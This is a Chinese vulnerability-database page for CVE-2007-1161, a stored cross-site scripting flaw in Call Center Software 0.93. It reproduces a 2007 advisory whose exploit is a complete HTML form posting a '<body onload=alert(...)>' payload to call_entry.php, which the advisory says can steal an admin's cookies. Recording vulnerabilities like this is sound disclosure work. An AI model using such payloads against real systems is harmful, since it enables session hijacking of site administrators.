Call Center Software call_entry.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191469 漏洞类型 跨站脚本
发布时间 2007-03-02 更新时间 2007-03-02
CVE编号 CVE-2007-1161 CNNVD-ID CNNVD-200703-097
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81904
https://cxsecurity.com/issue/WLB-2007030031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-097
|漏洞详情
CallCenterSoftware0,93版本的call_entry.php中存在跨站脚本攻击漏洞。远程攻击者可以借助problem_desc参数,注入任意的web脚本或HTML。
|漏洞EXP
-=[--------------------ADVISORY-------------------]=-
                                              
                       Call center 0,93
                                               
  Author: CorryL    [corryl80 (at) gmail (dot) com [email concealed]]   
-=[-----------------------------------------------]=-

-=[+] Application:    Call senter
-=[+] Version:        0,93
-=[+] Vendor's URL:   http://www.call-center-software.org/ 
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.xoned.net 
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

Call center software is one of the most important aspects of any call help center, 
being able to track and manage calls can be the key to high customer safisfacation. 
Our 100% free call center software solution is based on php and the mysql database.

..::[ Bug ]::..

An attacker exploiting this vulnerability is able steal the content
the cookies of the consumer admin in fact the bug situated is on an request post
then he remains memorized inside the database in attends him that the admin
goes to read the content of the call

..::[Exploit]::..

<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>

<body>
<table bgcolor="#FFFFFF" width="100%">
	<tr>
		<td align="center">
			<form method="post" action="http://remote_server/path/call_entry.php">
			<table border="0">
				<tr>
					<th class="ttitle">Adding Call</th>
				</tr>
				<tr>
					<td>
						<table width="100%" border="0" cellspacing="0" cellpadding="3">
													<tr>
								<td align="right">Name:</td><td align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td>
							</tr>
							<tr>
								<td align="right">Phone:</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td>
							</tr>
							<tr>
								<td align="right">Department:</td>
								<td>
									<select name="department_id">
																																                                                                <option value="1">Problem</option>
																</select>
								</td>
							</tr>
							<tr>
								<td align="right">Issue Type:</td>
								<td>
									<select name="issue_id">
																	<option value="6">email</option>
																	<option value="2">keyboard</option>
																	<option value="3">monitor</option>
																	<option value="5">mouse</option>
																	<option value="4">network</option>
																	<option value="8">password</option>
																	<option value="7">word processing</option>
																</select>
								</td>
							</tr>
							<tr>
								<td align="right" valign="top">Xss Script Here :</td>
								<td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td>
							</tr>
							<tr>
								<td></td><td><input type="submit" name="submit" value="Add" class="button"></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			</form>
		</td>
	</tr>	
</table>
</body>
</html>
|受影响的产品
Call Center Software Call Center Software 0.93
|参考资料

来源:BUGTRAQ
名称:20070221CallCenterSoftware-RemoteXssPostExploit-
链接:http://www.securityfocus.com/archive/1/archive/1/460797/100/0/threaded
来源:VIM
名称:20070222[TRUE]CallCenterSoftware-RemoteXssPostExploit-
链接:http://www.attrition.org/pipermail/vim/2007-February/001378.html
来源:SREASON
名称:2333
链接:http://securityreason.com/securityalert/2333
来源:OSVDB
名称:33037
链接:http://osvdb.org/33037